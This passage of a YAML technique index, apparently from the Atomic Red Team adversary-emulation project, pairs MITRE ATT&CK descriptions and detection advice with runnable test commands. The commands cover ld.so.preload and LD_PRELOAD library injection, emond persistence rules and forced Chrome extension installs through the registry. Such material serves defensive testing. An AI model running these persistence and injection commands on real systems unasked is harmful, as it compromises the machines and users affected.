2021. + - url: https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf + description: Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved + July 10, 2017. 
+ source_name: Writing Bad Malware for OSX + - source_name: wardle artofmalware volume1 + url: https://taomm.org/vol1/pdfs.html + description: 'Patrick Wardle. (2020, August 5). The Art of Mac Malware Volume + 0x1: Analysis. Retrieved March 19, 2021.' + - source_name: MalwareUnicorn macOS Dylib Injection MachO + url: https://malwareunicorn.org/workshops/macos_dylib_injection.html#5 + description: Amanda Rousseau. (2020, April 4). MacOS Dylib Injection Workshop. + Retrieved March 29, 2021. + - source_name: Apple Developer Doco Archive Run-Path + url: https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/RunpathDependentLibraries.html + description: Apple Inc.. (2012, July 7). Run-Path Dependent Libraries. Retrieved + March 31, 2021. + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2021-04-27T20:19:15.212Z' + created: '2020-03-16T15:23:30.896Z' + x_mitre_platforms: + - macOS + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Module: Module Load' + x_mitre_detection: "Monitor file systems for moving, renaming, replacing, or + modifying dylibs. Changes in the set of dylibs that are loaded by a process + (compared to past behavior) that do not correlate with known software, patches, + etc., are suspicious. Check the system for multiple dylibs with the same name + and monitor which versions have historically been loaded into a process. \n\nRun + path dependent libraries can include LC_LOAD_DYLIB, LC_LOAD_WEAK_DYLIB, + and LC_RPATH. 
Other special keywords are recognized by the macOS + loader are @rpath, @loader_path, and @executable_path.(Citation: + Apple Developer Doco Archive Run-Path) These loader instructions can be examined + for individual binaries or frameworks using the otool -l command. + Objective-See's Dylib Hijacking Scanner can be used to identify applications + vulnerable to dylib hijacking.(Citation: Wardle Dylib Hijack Vulnerable Apps)(Citation: + Github EmpireProject HijackScanner)" + x_mitre_is_subtechnique: true + x_mitre_version: '2.0' + x_mitre_defense_bypassed: + - Application control + atomic_tests: [] + T1574.006: + technique: + id: attack-pattern--633a100c-b2c9-41bf-9be5-905c1b16c825 + description: "Adversaries may execute their own malicious payloads by hijacking + environment variables the dynamic linker uses to load shared libraries. During + the execution preparation phase of a program, the dynamic linker loads specified + absolute paths of shared libraries from environment variables and files, such + as LD_PRELOAD on Linux or DYLD_INSERT_LIBRARIES + on macOS. Libraries specified in environment variables are loaded first, taking + precedence over system libraries with the same function name.(Citation: Man + LD.SO)(Citation: TLDP Shared Libraries)(Citation: Apple Doco Archive Dynamic + Libraries) These variables are often used by developers to debug binaries + without needing to recompile, deconflict mapped symbols, and implement custom + functions without changing the original library.(Citation: Baeldung LD_PRELOAD)\n\nOn + Linux and macOS, hijacking dynamic linker variables may grant access to the + victim process's memory, system/network resources, and possibly elevated privileges. + This method may also evade detection from security products since the execution + is masked under a legitimate process. Adversaries can set environment variables + via the command line using the export command, setenv + function, or putenv function. 
Adversaries can also leverage [Dynamic + Linker Hijacking](https://attack.mitre.org/techniques/T1574/006) to export + variables in a shell or set variables programmatically using higher level + syntax such Python’s os.environ.\n\nOn Linux, adversaries may + set LD_PRELOAD to point to malicious libraries that match the + name of legitimate libraries which are requested by a victim program, causing + the operating system to load the adversary's malicious code upon execution + of the victim program. LD_PRELOAD can be set via the environment + variable or /etc/ld.so.preload file.(Citation: Man LD.SO)(Citation: + TLDP Shared Libraries) Libraries specified by LD_PRELOAD are + loaded and mapped into memory by dlopen() and mmap() + respectively.(Citation: Code Injection on Linux and macOS)(Citation: Uninformed + Needle) (Citation: Phrack halfdead 1997)(Citation: Brown Exploiting Linkers) + \n\nOn macOS this behavior is conceptually the same as on Linux, differing + only in how the macOS dynamic libraries (dyld) is implemented at a lower level. 
+ Adversaries can set the DYLD_INSERT_LIBRARIES environment variable + to point to malicious libraries containing names of legitimate libraries or + functions requested by a victim program.(Citation: TheEvilBit DYLD_INSERT_LIBRARIES)(Citation: + Timac DYLD_INSERT_LIBRARIES)(Citation: Gabilondo DYLD_INSERT_LIBRARIES Catalina + Bypass) " + name: Dynamic Linker Hijacking + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1574.006 + url: https://attack.mitre.org/techniques/T1574/006 + - external_id: CAPEC-13 + source_name: capec + url: https://capec.mitre.org/data/definitions/13.html + - external_id: CAPEC-640 + source_name: capec + url: https://capec.mitre.org/data/definitions/640.html + - source_name: Man LD.SO + url: https://www.man7.org/linux/man-pages/man8/ld.so.8.html + description: Kerrisk, M. (2020, June 13). Linux Programmer's Manual. Retrieved + June 15, 2020. + - source_name: TLDP Shared Libraries + url: https://www.tldp.org/HOWTO/Program-Library-HOWTO/shared-libraries.html + description: The Linux Documentation Project. (n.d.). Shared Libraries. Retrieved + January 31, 2020. + - source_name: Apple Doco Archive Dynamic Libraries + url: https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/OverviewOfDynamicLibraries.html + description: Apple Inc.. (2012, July 23). Overview of Dynamic Libraries. Retrieved + March 24, 2021. + - source_name: Baeldung LD_PRELOAD + url: https://www.baeldung.com/linux/ld_preload-trick-what-is + description: baeldung. (2020, August 9). What Is the LD_PRELOAD Trick?. Retrieved + March 24, 2021. + - source_name: Code Injection on Linux and macOS + url: https://www.datawire.io/code-injection-on-linux-and-macos/ + description: 'Itamar Turner-Trauring. (2017, April 18). 
“This will only hurt + for a moment”: code injection on Linux and macOS with LD_PRELOAD. Retrieved + December 20, 2017.' + - url: http://hick.org/code/skape/papers/needle.txt + description: skape. (2003, January 19). Linux x86 run-time process manipulation. + Retrieved December 20, 2017. + source_name: Uninformed Needle + - url: http://phrack.org/issues/51/8.html + description: halflife. (1997, September 1). Shared Library Redirection Techniques. + Retrieved December 20, 2017. + source_name: Phrack halfdead 1997 + - source_name: Brown Exploiting Linkers + url: http://www.nth-dimension.org.uk/pub/BTL.pdf + description: 'Tim Brown. (2011, June 29). Breaking the links: Exploiting the + linker. Retrieved March 29, 2021.' + - source_name: TheEvilBit DYLD_INSERT_LIBRARIES + url: https://theevilbit.github.io/posts/dyld_insert_libraries_dylib_injection_in_macos_osx_deep_dive/ + description: Fitzl, C. (2019, July 9). DYLD_INSERT_LIBRARIES DYLIB injection + in macOS / OSX. Retrieved March 26, 2020. + - source_name: Timac DYLD_INSERT_LIBRARIES + url: https://blog.timac.org/2012/1218-simple-code-injection-using-dyld_insert_libraries/ + description: Timac. (2012, December 18). Simple code injection using DYLD_INSERT_LIBRARIES. + Retrieved March 26, 2020. + - source_name: Gabilondo DYLD_INSERT_LIBRARIES Catalina Bypass + url: https://jon-gabilondo-angulo-7635.medium.com/how-to-inject-code-into-mach-o-apps-part-ii-ddb13ebc8191 + description: Jon Gabilondo. (2019, September 22). How to Inject Code into + Mach-O Apps. Part II.. Retrieved March 24, 2021. 
+ type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2021-04-27T19:55:18.453Z' + created: '2020-03-13T20:09:59.569Z' + x_mitre_permissions_required: + - User + x_mitre_platforms: + - Linux + - macOS + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Module: Module Load' + - 'Process: Process Creation' + - 'Command: Command Execution' + x_mitre_detection: |- + Monitor for changes to environment variables and files associated with loading shared libraries such as LD_PRELOAD and DYLD_INSERT_LIBRARIES, as well as the commands to implement these changes. + + Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates. + x_mitre_is_subtechnique: true + x_mitre_version: '2.0' + identifier: T1574.006 + atomic_tests: + - name: Shared Library Injection via /etc/ld.so.preload + auto_generated_guid: 39cb0e67-dd0d-4b74-a74b-c072db7ae991 + description: "This test adds a shared library to the `ld.so.preload` list to + execute and intercept API calls. This technique was used by threat actor Rocke + during the exploitation of Linux web servers. This requires the `glibc` package.\n\nUpon + successful execution, bash will echo `../bin/T1574.006.so` to /etc/ld.so.preload. 
+ \n" + supported_platforms: + - linux + input_arguments: + path_to_shared_library_source: + description: Path to a shared library source code + type: Path + default: PathToAtomicsFolder/T1574.006/src/Linux/T1574.006.c + path_to_shared_library: + description: Path to a shared library object + type: Path + default: "/tmp/T1574006.so" + dependency_executor_name: bash + dependencies: + - description: 'The shared library must exist on disk at specified location + (#{path_to_shared_library}) + +' + prereq_command: 'if [ -f #{path_to_shared_library ]; then exit 0; else exit + 1; fi; + +' + get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} + +' + executor: + command: 'sudo sh -c ''echo #{path_to_shared_library} > /etc/ld.so.preload'' + +' + cleanup_command: 'sudo sed -i ''\~#{path_to_shared_library}~d'' /etc/ld.so.preload + +' + name: bash + elevation_required: true + - name: Shared Library Injection via LD_PRELOAD + auto_generated_guid: bc219ff7-789f-4d51-9142-ecae3397deae + description: | + This test injects a shared object library via the LD_PRELOAD environment variable to execute. This technique was used by threat actor Rocke during the exploitation of Linux web servers. This requires the `glibc` package. + + Upon successful execution, bash will utilize LD_PRELOAD to load the shared object library `/etc/ld.so.preload`. Output will be via stdout. 
+ supported_platforms: + - linux + input_arguments: + path_to_shared_library_source: + description: Path to a shared library source code + type: Path + default: PathToAtomicsFolder/T1574.006/src/Linux/T1574.006.c + path_to_shared_library: + description: Path to a shared library object + type: Path + default: "/tmp/T1574006.so" + dependency_executor_name: bash + dependencies: + - description: 'The shared library must exist on disk at specified location + (#{path_to_shared_library}) + +' + prereq_command: 'if [ -f #{path_to_shared_library} ]; then exit 0; else exit + 1; fi; + +' + get_prereq_command: 'gcc -shared -fPIC -o #{path_to_shared_library} #{path_to_shared_library_source} + +' + executor: + command: 'LD_PRELOAD=#{path_to_shared_library} ls + +' + name: bash + T1546.014: + technique: + external_references: + - source_name: mitre-attack + external_id: T1546.014 + url: https://attack.mitre.org/techniques/T1546/014 + - source_name: xorrior emond Jan 2018 + url: https://www.xorrior.com/emond-persistence/ + description: Ross, Chris. (2018, January 17). Leveraging Emond on macOS For + Persistence. Retrieved September 10, 2019. + - source_name: magnusviri emond Apr 2016 + url: http://www.magnusviri.com/Mac/what-is-emond.html + description: Reynolds, James. (2016, April 7). What is emond?. Retrieved September + 10, 2019. + - source_name: sentinelone macos persist Jun 2019 + url: https://www.sentinelone.com/blog/how-malware-persists-on-macos/ + description: Stokes, Phil. (2019, June 17). HOW MALWARE PERSISTS ON MACOS. + Retrieved September 10, 2019. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Emond + description: |- + Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond). 
Emond is a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at /sbin/emond will load any rules from the /etc/emond.d/rules/ directory and take action once an explicitly defined event takes place. + + The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) + + Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service. 
+ id: attack-pattern--9c45eaa3-8604-4780-8988-b5074dbb9ecd + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-03-24T21:37:25.307Z' + created: '2020-01-24T15:15:13.426Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + x_mitre_detection: Monitor emond rules creation by checking for files created + or modified in /etc/emond.d/rules/ and /private/var/db/emondClients. + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'File: File Modification' + - 'File: File Creation' + x_mitre_contributors: + - Ivan Sinyakov + x_mitre_platforms: + - macOS + identifier: T1546.014 + atomic_tests: + - name: Persistance with Event Monitor - emond + auto_generated_guid: 23c9c127-322b-4c75-95ca-eff464906114 + description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor) + daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124 + +' + supported_platforms: + - macos + input_arguments: + plist: + description: Path to attacker emond plist file + type: path + default: PathToAtomicsFolder/T1546.014/src/T1546.014_emond.plist + executor: + command: | + sudo cp "#{plist}" /etc/emond.d/rules/T1546.014_emond.plist + sudo touch /private/var/db/emondClients/T1546.014 + cleanup_command: | + sudo rm /etc/emond.d/rules/T1546.014_emond.plist + sudo rm /private/var/db/emondClients/T1546.014 + name: sh + elevation_required: true + T1546: + technique: + id: attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db + description: "Adversaries may establish persistence and/or elevate privileges + using system mechanisms that trigger execution based on specific events. 
Various + operating systems have means to monitor and subscribe to events such as logons + or other user activity such as running specific applications/binaries. \n\nAdversaries + may abuse these mechanisms as a means of maintaining persistent access to + a victim via repeatedly executing malicious code. After gaining access to + a victim system, adversaries may create/modify event triggers to point to + malicious content that will be executed whenever the event trigger is invoked.(Citation: + FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia + malware)\n\nSince the execution can be proxied by an account with higher permissions, + such as SYSTEM or service accounts, an adversary may be able to abuse these + triggered execution mechanisms to escalate their privileges. " + name: Event Triggered Execution + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1546 + url: https://attack.mitre.org/techniques/T1546 + - url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf + description: Ballenthin, W., et al. (2015). Windows Management Instrumentation + (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016. + source_name: FireEye WMI 2015 + - url: https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf + description: Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. + Retrieved July 10, 2017. + source_name: Malware Persistence on OS X + - url: https://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/ + description: Claud Xiao, Cong Zheng, Yanhui Jia. (2017, April 6). New IoT/Linux + Malware Targets DVRs, Forms Botnet. Retrieved February 19, 2018. 
+ source_name: amnesia malware + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-04-13T21:32:54.610Z' + created: '2020-01-22T21:04:23.285Z' + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Windows Registry: Windows Registry Key Modification' + - 'Command: Command Execution' + - 'File: File Creation' + - 'File: File Modification' + - 'WMI: WMI Creation' + - 'File: File Metadata' + - 'Module: Module Load' + x_mitre_detection: "Monitoring for additions or modifications of mechanisms + that could be used to trigger event-based execution, especially the addition + of abnormal commands such as execution of unknown programs, opening network + sockets, or reaching out across the network. Also look for changes that do + not line up with updates, patches, or other planned administrative activity. + \n\nThese mechanisms may vary by OS, but are typically stored in central repositories + that store configuration information such as the Windows Registry, Common + Information Model (CIM), and/or specific named files, the last of which can + be hashed and compared to known good values. \n\nMonitor for processes, API/System + calls, and other common ways of manipulating these event repositories. \n\nTools + such as Sysinternals Autoruns can be used to detect changes to execution triggers + that could be attempts at persistence. Also look for abnormal process call + trees for execution of other commands that could relate to Discovery actions + or other techniques. \n\nMonitor DLL loads by processes, specifically looking + for DLLs that are not recognized or not normally loaded into a process. Look + for abnormal process behavior that may be due to a process loading a malicious + DLL. 
Data and events should not be viewed in isolation, but as part of a chain + of behavior that could lead to other activities, such as making network connections + for Command and Control, learning details about the environment through Discovery, + and conducting Lateral Movement. " + x_mitre_is_subtechnique: false + x_mitre_version: '1.1' + atomic_tests: [] + T1098.002: + technique: + external_references: + - source_name: mitre-attack + external_id: T1098.002 + url: https://attack.mitre.org/techniques/T1098/002 + - source_name: Microsoft - Add-MailboxPermission + url: https://docs.microsoft.com/en-us/powershell/module/exchange/mailboxes/add-mailboxpermission?view=exchange-ps + description: Microsoft. (n.d.). Add-Mailbox Permission. Retrieved September + 13, 2019. + - url: https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf + description: Mandiant. (2018). Mandiant M-Trends 2018. Retrieved July 9, 2018. + source_name: FireEye APT35 2018 + - source_name: Crowdstrike Hiding in Plain Sight 2018 + url: https://www.crowdstrike.com/blog/hiding-in-plain-sight-using-the-office-365-activities-api-to-investigate-business-email-compromises/ + description: 'Crowdstrike. (2018, July 18). Hiding in Plain Sight: Using the + Office 365 Activities API to Investigate Business Email Compromises. Retrieved + January 19, 2020.' + - source_name: Bienstock, D. - Defending O365 - 2019 + url: https://www.slideshare.net/DouglasBienstock/shmoocon-2019-becs-and-beyond-investigating-and-defending-office-365 + description: 'Bienstock, D.. (2019). BECS and Beyond: Investigating and Defending + O365. Retrieved September 13, 2019.' 
+ object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Exchange Email Delegate Permissions + description: |- + Adversaries may grant additional permission levels, such as ReadPermission or FullAccess, to maintain persistent access to an adversary-controlled email account. The Add-MailboxPermission [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018) + + This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can assign more access rights to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)), so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019) + id: attack-pattern--e74de37c-a829-446c-937d-56a44f0e9306 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-05-04T19:18:36.254Z' + created: '2020-01-19T16:54:28.516Z' + x_mitre_contributors: + - Jannie Li, Microsoft Threat Intelligence Center (MSTIC) + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + x_mitre_detection: |- + Monitor for unusual Exchange and Office 365 email account permissions changes that may indicate excessively broad permissions being granted to compromised accounts. 
+ + A larger than normal volume of emails sent from an account and similar phishing emails sent from  real accounts within a network may be a sign that an account was compromised and attempts to leverage access with modified email permissions is occurring. + x_mitre_data_sources: + - 'Group: Group Modification' + - 'User Account: User Account Modification' + x_mitre_platforms: + - Windows + - Office 365 + atomic_tests: [] + T1574.005: + technique: + external_references: + - source_name: mitre-attack + external_id: T1574.005 + url: https://attack.mitre.org/techniques/T1574/005 + - source_name: mozilla_sec_adv_2012 + url: https://www.mozilla.org/en-US/security/advisories/mfsa2012-98/ + description: Robert Kugler. (2012, November 20). Mozilla Foundation Security + Advisory 2012-98. Retrieved March 10, 2017. + - source_name: Executable Installers are Vulnerable + url: https://seclists.org/fulldisclosure/2015/Dec/34 + description: 'Stefan Kanthak. (2015, December 8). Executable installers are + vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation + of privilege. Retrieved December 4, 2014.' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Executable Installer File Permissions Weakness + description: |- + Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. 
If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM. + + Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001). + + Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012) (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence. 
+ id: attack-pattern--70d81154-b187-45f9-8ec5-295d01255979 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2020-03-26T19:20:23.030Z' + created: '2020-03-13T11:12:18.558Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + - User + x_mitre_effective_permissions: + - Administrator + - User + - SYSTEM + x_mitre_detection: |- + Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data. + + Look for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques. + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Module: Module Load' + - 'Process: Process Creation' + - 'Service: Service Metadata' + x_mitre_contributors: + - Travis Smith, Tripwire + - Stefan Kanthak + x_mitre_platforms: + - Windows + atomic_tests: [] + T1133: + technique: + id: attack-pattern--10d51417-ee35-4589-b1ff-b6df1c334e8d + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: External Remote Services + description: |- + Adversaries may leverage external-facing remote services to initially access and/or persist within a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. 
Services such as [Windows Remote Management](https://attack.mitre.org/techniques/T1021/006) can also be used externally. + + Access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network.(Citation: Volexity Virtual Private Keylogging) Access to remote services may be used as a redundant or persistent access mechanism during an operation. + + Access may also be gained through an exposed service that doesn’t require authentication. In containerized environments, this may include an exposed Docker API, Kubernetes API server, kubelet, or web application such as the Kubernetes dashboard.(Citation: Trend Micro Exposed Docker Server)(Citation: Unit 42 Hildegard Malware) + external_references: + - source_name: mitre-attack + external_id: T1133 + url: https://attack.mitre.org/techniques/T1133 + - external_id: CAPEC-555 + source_name: capec + url: https://capec.mitre.org/data/definitions/555.html + - url: https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/ + description: 'Adair, S. (2015, October 7). Virtual Private Keylogging: Cisco + Web VPNs Leveraged for Access and Persistence. Retrieved March 20, 2017.' + source_name: Volexity Virtual Private Keylogging + - source_name: Trend Micro Exposed Docker Server + url: https://www.trendmicro.com/en_us/research/20/f/xorddos-kaiji-botnet-malware-variants-target-exposed-docker-servers.html + description: Remillano II, A., et al. (2020, June 20). XORDDoS, Kaiji Variants + Target Exposed Docker Servers. Retrieved April 5, 2021. + - source_name: Unit 42 Hildegard Malware + url: https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/ + description: 'Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking + Malware Targeting Kubernetes. 
Retrieved April 5, 2021.' + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: initial-access + modified: '2021-04-22T20:22:02.443Z' + created: '2017-05-31T21:31:44.421Z' + x_mitre_is_subtechnique: false + x_mitre_platforms: + - Windows + - Linux + - Containers + x_mitre_permissions_required: + - User + x_mitre_detection: |- + Follow best practices for detecting adversary use of [Valid Accounts](https://attack.mitre.org/techniques/T1078) for authenticating to remote services. Collect authentication logs and analyze for unusual access patterns, windows of activity, and access outside of normal business hours. + + When authentication is not required to access an exposed remote service, monitor for follow-on activities such as anomalous external use of the exposed API or application. + x_mitre_data_sources: + - 'Application Log: Application Log Content' + - 'Logon Session: Logon Session Metadata' + - 'Network Traffic: Network Traffic Flow' + x_mitre_contributors: + - ExtraHop + - David Fiser, @anu4is, Trend Micro + - Alfredo Oliveira, Trend Micro + - Idan Frimark, Cisco + - Rory McCune, Aqua Security + - Yuval Avrahami, Palo Alto Networks + - Jay Chen, Palo Alto Networks + - Brad Geesaman, @bradgeesaman + - Magno Logan, @magnologan, Trend Micro + - Ariel Shuper, Cisco + - Yossi Weizman, Azure Defender Research Team + - Vishwas Manral, McAfee + - Daniel Oakley + - Travis Smith, Tripwire + x_mitre_version: '2.2' + identifier: T1133 + atomic_tests: + - name: Running Chrome VPN Extensions via the Registry 2 vpn extension + auto_generated_guid: 4c8db261-a58b-42a6-a866-0a294deedde4 + description: 'Running Chrome VPN Extensions via the Registry install 2 vpn extension, + please see "T1133\src\list of vpn extension.txt" to view complete list + +' + supported_platforms: + - windows + 
input_arguments: + chrome_url: + description: chrome installer download URL + type: url + default: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7BFD62DDBC-14C6-20BD-706F-C7744738E422%7D%26lang%3Den%26browser%3D3%26usagestats%3D0%26appname%3DGoogle%2520Chrome%26needsadmin%3Dprefers%26ap%3Dx64-stable-statsdef_1%26installdataindex%3Dempty/chrome/install/ChromeStandaloneSetup64.exe + extension_id: + description: chrome extension id + type: String + default: '"fcfhplploccackoneaefokcmbjfbkenj", "fdcgdnkidjaadafnichfpabhfomcebme" + +' + dependency_executor_name: powershell + dependencies: + - description: 'Chrome must be installed + +' + prereq_command: if ((Test-Path "C:\Program Files\Google\Chrome\Application\chrome.exe") + -Or (Test-Path "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe")) + {exit 0} else {exit 1} + get_prereq_command: "Invoke-WebRequest -OutFile $env:temp\\ChromeStandaloneSetup64.exe + #{chrome_url}\nStart-Process $env:temp\\ChromeStandaloneSetup64.exe /S \n" + executor: + name: powershell + elevation_required: true + command: | + $extList = #{extension_id} + foreach ($extension in $extList) { + New-Item -Path HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension -Force + New-ItemProperty -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension" -Name "update_url" -Value "https://clients2.google.com/service/update2/crx" -PropertyType "String" -Force} + Start chrome + Start-Sleep -Seconds 30 + Stop-Process -Name "chrome" + cleanup_command: | + $extList = #{extension_id} + foreach ($extension in $extList) { + Remove-Item -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension" -ErrorAction Ignore} + T1574: + technique: + external_references: + - source_name: mitre-attack + external_id: T1574 + url: https://attack.mitre.org/techniques/T1574 + - source_name: Autoruns for Windows + url: https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns + description: 
Mark Russinovich. (2019, June 28). Autoruns for Windows v13.96. + Retrieved March 13, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Hijack Execution Flow + description: |- + Adversaries may execute their own malicious payloads by hijacking the way operating systems run programs. Hijacking execution flow can be for the purposes of persistence, since this hijacked execution may reoccur over time. Adversaries may also use these mechanisms to elevate privileges or evade defenses, such as application control or other restrictions on execution. + + There are many ways an adversary may hijack the flow of execution, including by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs/resources, such as file directories and in the case of Windows the Registry, could also be poisoned to include malicious payloads. + id: attack-pattern--aedfca76-3b30-4866-b2aa-0f1d7fd1e4b6 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: defense-evasion + modified: '2021-04-27T19:55:20.290Z' + created: '2020-03-12T20:38:12.465Z' + x_mitre_data_sources: + - 'Windows 